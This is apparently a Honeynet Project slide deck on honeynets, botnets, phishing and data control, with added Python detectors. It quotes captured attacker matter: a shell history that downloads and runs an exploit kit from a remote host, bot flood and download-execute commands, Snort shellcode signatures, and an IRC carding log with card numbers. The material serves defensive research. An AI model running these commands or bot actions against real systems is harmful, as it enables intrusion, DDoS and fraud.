Title: Honeynets and The Honeynet Project
1. Honeynets and The Honeynet Project
2. Speaker
3. Purpose
- To explain our organization, our value to you, and our research.
4. Agenda
- The Honeynet Project and Research Alliance
- The Threat
- How Honeynets Work
- Learning More
5. Honeynet Project
6. Problem
- How can we defend against an enemy when we don't even know who the enemy is?
7. Mission Statement
- To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned.
8. Our Goal
- Improve security of the Internet at no cost to the public.
- Awareness: Raise awareness of the threats that exist.
- Information: For those already aware, we teach and inform about the threats.
- Research: We give organizations the capabilities to learn more on their own.
9. Honeynet Project
- Non-profit (501c3) organization with Board of Directors.
- Funded by sponsors.
- Global set of diverse skills and experiences.
- Open Source: share all of our research and findings at no cost to the public.
- Deploy networks around the world to be hacked.
- Everything we capture is happening in the wild.
- We have nothing to sell.
10. Honeynet Research Alliance
- Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies.
- http://www.honeynet.org/alliance/
11. Alliance Members
- South Florida Honeynet Project
- Georgia Technical Institute
- Azusa Pacific University
- USMA Honeynet Project
- Pakistan Honeynet Project
- Paladion Networks Honeynet Project (India)
- Internet Systematics Lab Honeynet Project (Greece)
- Honeynet.BR (Brazil)
- UK Honeynet
- French Honeynet Project
- Italian Honeynet Project
- Portugal Honeynet Project
- German Honeynet Project
- Spanish Honeynet Project
- Singapore Honeynet Project
- China Honeynet Project
12. The Threat
13. What we have captured
- The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
- Little has yet been captured on advanced threats; few honeynets to date have been designed to capture them.
14. The Threat
- Hundreds of scans a day.
- Fastest time a honeypot was manually compromised: 15 minutes (by a worm: under 60 seconds).
- Life expectancy of a vulnerable Win32 system is under three hours; of a vulnerable Linux system, three months.
- Primarily cyber-crime, focused on Win32 systems and their users.
- Attackers can control thousands of systems (botnets).
15. The Threat
16. The Motive
- Motives vary, but we are seeing more and more that are criminally motivated.
- Several years ago, hackers hacked computers. Now, criminals hack computers.
- Fraud, extortion and identity theft have been around for centuries; the net just makes it easier.
17. DDoS for Money
<J4ck> why don't you start charging for packet attacks?
<J4ck> "give me x amount and I'll take bla bla offline for this amount of time"
<J1LL> it was illegal last I checked
<J4ck> heh, then everything you do is illegal. Why not make money off of it?
<J4ck> I know plenty of people that'd pay exorbitant amounts for packeting
18. The Target
- The mass users.
- Tend to be non-security aware, making them easy targets.
- Economies of scale (it's a global target).
19. Interesting Trends
- Attacks often originate from economically depressed countries (Romania is an example).
- Attacks shifting from the computer to the user (computers are getting harder to hack).
- Attackers continue to get more sophisticated.
20. The Tools
- Attacks used to be primarily worms and autorooters.
- New advances include botnets and phishing.
- Tools are constantly advancing.
21. The Old Days
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
22. Botnets
- Large networks of hacked systems.
- Often thousands, if not tens of thousands, of hacked systems under the control of a single user.
- Automated commands used to control the zombies.
23. How They Work
- After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.
- The binary is started, and connects to the hard-coded master IRC server.
- Often a dynamic DNS name is provided rather than a hard-coded IP address, so the bot can be easily relocated.
- Using a specially crafted nickname like USA743634, the bot joins the master's channel, sometimes using a password to keep strangers out of the channel.
24. 80% of traffic
- Port 445/TCP
- Port 139/TCP
- Port 135/TCP
- Port 137/UDP
- Infected systems most often WinXP-SP1 and Win2000
25. Bots
- ddos.synflood <host> <time> <delay> <port>: starts a SYN flood
- ddos.httpflood <url> <number> <referrer> <recursive true|false>: starts an HTTP flood
- scan.listnetranges: list scanned netranges
- scan.start: starts all enabled scanners
- scan.stop: stops all scanners
- http.download: download a file via HTTP
- http.execute: updates the bot via the given HTTP URL
- http.update: executes a file from a given HTTP URL
- cvar.set spam_aol_channel <channel>: AOL Spam - Channel name
- cvar.set spam_aol_enabled <1/0>: AOL Spam - Enabled?
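The two slides above (How They Work, Bots) give three network-visible indicators of a bot checking in: a crafted nickname, a JOIN to a key-protected master channel, and command vocabulary with ddos/scan/http/cvar prefixes. The following detector, written for this page and not part of the project's tools, flags those indicators in captured IRC session lines; the sample session, channel name and key are constructed.

```python
import re
from dataclasses import dataclass, field

# Bot nickname pattern from the slides: country code plus digits, e.g. USA743634.
BOT_NICK = re.compile(r"^[A-Z]{2,3}\d{5,8}$")
# Command families from the Bots slide; prefixes only, the list is not exhaustive.
BOT_CMD = re.compile(r"\b(ddos|scan|http|cvar)\.[a-z]+\b")

@dataclass
class Verdict:
    bot_nicks: set = field(default_factory=set)
    keyed_joins: list = field(default_factory=list)   # (channel, key)
    commands: list = field(default_factory=list)      # (channel, command)

    def score(self) -> int:
        """Number of bot indicators seen; anything above 0 deserves a look."""
        return len(self.bot_nicks) + len(self.keyed_joins) + len(self.commands)

def _strip_prefix(line: str) -> str:
    # Server-relayed messages start with ":nick!user@host "; drop it to reach the verb.
    return line.split(" ", 1)[-1] if line.startswith(":") else line

def analyze_irc(lines) -> Verdict:
    v = Verdict()
    for raw in lines:
        parts = _strip_prefix(raw.rstrip("\r\n")).split(" ")
        verb = parts[0].upper()
        if verb == "NICK" and len(parts) > 1:
            nick = parts[1].lstrip(":")
            if BOT_NICK.match(nick):
                v.bot_nicks.add(nick)
        elif verb == "JOIN" and len(parts) > 2:
            # JOIN <#channel> <key>: a key-protected master channel.
            v.keyed_joins.append((parts[1], parts[2]))
        elif verb == "PRIVMSG" and len(parts) > 2:
            text = " ".join(parts[2:]).lstrip(":")
            m = BOT_CMD.search(text)
            if m:
                v.commands.append((parts[1], m.group(0)))
    return v

# Constructed sample session (not captured data from the project).
SAMPLE = [
    "NICK USA743634",
    "USER USA743634 0 * :bot",
    "JOIN #master s3cret",
    ":master!op@example.invalid PRIVMSG #master :.scan.start",
    ":master!op@example.invalid PRIVMSG #master :http.download http://example.invalid/b.exe",
    ":someone!u@example.invalid PRIVMSG #chat :hi all",
]

if __name__ == "__main__":
    verdict = analyze_irc(SAMPLE)
    print(verdict, "score:", verdict.score())
```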
26. Numbers
- Over a 4-month period
- More than 100 botnets were tracked
- One channel had over 200,000 IP addresses.
- One computer was compromised by 16 bots.
- Estimate over 1 million systems compromised.
27. Botnet Economy
- Botnets sold or for rent.
- Saw botnets being stolen from each other.
- Observed harvesting of information from all
compromised machines. For example, the operator
of the botnet can request a list of CD-keys (e.g.
for Windows or games) from all bots. These
CD-keys can be sold or used for other purposes
since they are considered valuable information.
28. Phishing
- Social engineer victims to give up valuable information (login, password, credit card number, etc).
- Easier to hack the user than the computers.
- Need attacks against instant messaging.
- http://www.antiphishing.org
29. The Sting
30. Getting the Info
31. Infrastructure
- Attackers build networks of thousands of hacked systems (often botnets).
- Upload pre-made packages for phishing.
- Use platforms for sending out spoofed email.
- Use platforms for false websites.
32. A Phishing Rootkit
-rw-r--r-- 1 free web  14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web   7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web  10383 Jul  3 19:07 index.html
-rw-r--r-- 1 free web    413 Jul 18 22:09 index.zip
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web   8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web  12163 Jun  9 01:31 send.php
-rw-r--r-- 1 free web   2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web   2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web   2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web   2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web   1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web   2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web  83862 Jun  9 09:56 spamz.zip
-rw-r--r-- 1 free web  36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web  36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web     49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun  8 13:17 www1.tar.gz
33. Credit Cards Exchanging
04:55:16 <COCO_JAA> !cc
04:55:23 <Chk> (COCO_JAA) CC for U: Bob Johns, P. O. Box 126, Wendel, CA 25631, United States, 510-863-4884, 4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) (TraDecS Chk_Bot FoR goldcard)
04:55:42 <COCO_JAA> !cclimit 4407070000588951
04:55:46 <Chk> (COCO_JAA) Limit for Ur MasterCard (5407070000788951) 0.881 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
04:56:55 <COCO_JAA> !cardablesite
04:57:22 <COCO_JAA> !cardable electronics
04:57:27 <Chk> (COCO_JAA) Site where you can card electronics (TraDecS Chk_bot FoR goldcard)
04:58:09 <COCO_JAA> !cclimit 4234294391131136
04:58:12 <Chk> (COCO_JAA) Limit for Ur Visa (4264294291131136) 9.697 (This Doesn't Mean Its Valid) (TraDecS Chk_bot FoR channel)
34. The Future
- Hacking is profitable and it is difficult to get caught.
- Expect more attacks to focus on the end user or the client.
- Expect things to get worse; bad guys adapt faster.
35. Honeynets
36. Honeypots
- A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
- Has no production value; anything going to or from a honeypot is likely a probe, attack or compromise.
- Primary value to most organizations is information.
37. Advantages
- Collect small data sets of high value.
- Reduce false positives
- Catch new attacks, false negatives
- Work in encrypted or IPv6 environments
- Simple concept requiring minimal resources.
38. Disadvantages
- Limited field of view (microscope)
- Risk (mainly high-interaction honeypots)
39. Types
- Low-interaction
  - Emulates services, applications, and OSs.
  - Low risk and easy to deploy/maintain, but captures limited information.
- High-interaction
  - Real services, applications, and OSs.
  - Captures extensive information, but high risk and time intensive to maintain.
40. Examples of Honeypots
Low Interaction
- BackOfficer Friendly
- KFSensor
- Honeyd
High Interaction
- Honeynets
41. Honeynets
- High-interaction honeypot designed to capture in-depth information.
- Information has different value to different organizations.
- It's an architecture you populate with live systems, not a product or software.
- Any traffic entering or leaving is suspect.
42. How it works
- A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
- Data Control
- Data Capture
- Data Analysis
http://www.honeynet.org/papers/honeynet/
43. Honeynet Architecture
44. Data Control
- Mitigate risk of the honeynet being used to harm non-honeynet systems.
- Count outbound connections.
- IPS (Snort-Inline)
- Bandwidth Throttling
45. No Data Control
46. Data Control
47. Snort-Inline
# Detection only: alert on the shellcode signature in traffic to port 53 (named).
alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A; content:"|CD80 E8D7 FFFFFF|/bin/sh";)

# Snort-Inline: same match, but replace rewrites the payload in transit (same length),
# so the exploit fails while the attacker still sees a response and keeps interacting.
alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)
48. Data Capture
- Capture all activity at a variety of levels.
- Network activity.
- Application activity.
- System activity.
49. Sebek
- Hidden kernel module that captures all host activity.
- Dumps activity to the network.
- The attacker cannot sniff this traffic: the module hides packets by their magic number and destination port.
50. Sebek Architecture
51. Honeywall CDROM
- Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
- May 2003: Released Eeyore
- May 2005: Released Roo
52. Eeyore Problems
- OS too minimized, almost crippled. Could not easily add functionality.
- Difficult to modify since it is a LiveCD.
- Limited distributed capabilities
- No GUI administration
- No Data Analysis
- No international or SCSI support
53. Roo Honeywall CDROM
- Based on Fedora Core 3
- Vastly improved hardware and international support.
- Automated, headless installation
- New Walleye interface for web-based administration and data analysis.
- Automated system updating.
54. Installation
- Just insert the CDROM and boot; it installs to the local hard drive.
- After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.
- Following installation, you get a command prompt and the system is ready to configure.
55. First Boot
56. Install
57. Configure
58. 3 Methods to Maintain
- Command Line Interface
- Dialog Interface
- Web GUI (Walleye)
59. Command Line Interface
- Local or SSH access only.
- Use the utility hwctl to modify configurations and restart services.
- hwctl HwTCPRATE=30
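The Data Control slide lists counting outbound connections as the first control, and the hwctl line above sets the Honeywall's TCP limit to 30 per hour. The simulation below, added here and not the Honeywall's own code, applies that sliding-window limit per honeypot and per protocol to a constructed set of flow records; the honeypot addresses and the non-TCP limits are assumptions for the example.

```python
from collections import defaultdict

# Outbound connections allowed per honeypot per protocol per hour.
# The TCP value is the slide's hwctl HwTCPRATE=30; the others are assumed here.
LIMITS = {"tcp": 30, "udp": 20, "icmp": 50, "other": 10}
WINDOW = 3600  # one hour, in seconds

# Constructed honeypot addresses; only flows they originate are limited.
HONEYPOTS = {"10.0.0.5", "10.0.0.6"}

def enforce(flows, limits=LIMITS):
    """flows: (ts, src, proto, dst, dport) tuples, ts in seconds.
    Returns (allowed, blocked); inbound traffic is always allowed."""
    history = defaultdict(list)  # (src, proto) -> timestamps of allowed flows
    allowed, blocked = [], []
    for flow in sorted(flows):
        ts, src, proto, _dst, _dport = flow
        if src not in HONEYPOTS:
            allowed.append(flow)
            continue
        proto = proto if proto in limits else "other"
        key = (src, proto)
        # Keep only connections still inside the sliding one-hour window.
        history[key] = [t for t in history[key] if ts - t < WINDOW]
        if len(history[key]) >= limits[proto]:
            blocked.append(flow)  # over the limit: dropped, attacker sees nothing
        else:
            history[key].append(ts)
            allowed.append(flow)
    return allowed, blocked

def sample_flows():
    """Constructed data: 10.0.0.5 opens 35 TCP/445 connections in 9 minutes,
    then one more an hour later; 10.0.0.6 sends 3 UDP/137 packets."""
    flows = [(i * 15, "10.0.0.5", "tcp", "198.51.100.9", 445) for i in range(35)]
    flows.append((35 * 15 + WINDOW, "10.0.0.5", "tcp", "198.51.100.9", 445))
    flows += [(100 + i, "10.0.0.6", "udp", "198.51.100.2", 137) for i in range(3)]
    flows.append((5, "203.0.113.4", "tcp", "10.0.0.5", 445))  # inbound attacker
    return flows

if __name__ == "__main__":
    ok, dropped = enforce(sample_flows())
    print(f"allowed {len(ok)}, blocked {len(dropped)}")
    for f in dropped:
        print("blocked", f)
```

Blocked flows are exactly the 31st through 35th TCP connections from 10.0.0.5; the one an hour later is allowed again because the window has slid past the earlier burst.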
60. Dialog Menu
61. Data Administration
62. Data Analysis
- Most critical part: the purpose of a honeynet is to gather information and learn.
- Need a method to analyze all the different elements of information.
- Walleye is the new solution; it comes with the CDROM.
63. Walleye
64. Data Analysis
65. Data Analysis Flows
66. Data Analysis Details
67. Processes
68. Files
69. Distributed Capabilities
70. Issues
- Require extensive resources to properly maintain.
- Detection and anti-honeynet technologies have been introduced.
- Can be used to attack or harm other non-Honeynet systems.
- Privacy can be a potential issue.
71. Legal Contact for .mil / .gov
- Department of Justice Computer Crime and Intellectual Property Section.
- Paul Ohm
- Number: (202) 514.1026
- E-Mail: paul.ohm_at_usdoj.gov
72. Learning More
73. Our Website
- Know Your Enemy papers.
- Scan of the Month Challenges
- Latest Tools and Technologies
- http://www.honeynet.org/
74. Our Book
http://www.honeynet.org/book
75. Sponsoring
Advanced Network Management Lab
YOU?
76. How to Sponsor
- Sponsor development of a new tool
- Sponsor authorship of a new research paper.
- Sponsor research and development.
- Buy our book
<project_at_honeynet.org> http://www.honeynet.org/funds/
77. Conclusion
- The Honeynet Project is a non-profit research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
78.
- http://www.honeynet.org
- <project_at_honeynet.org>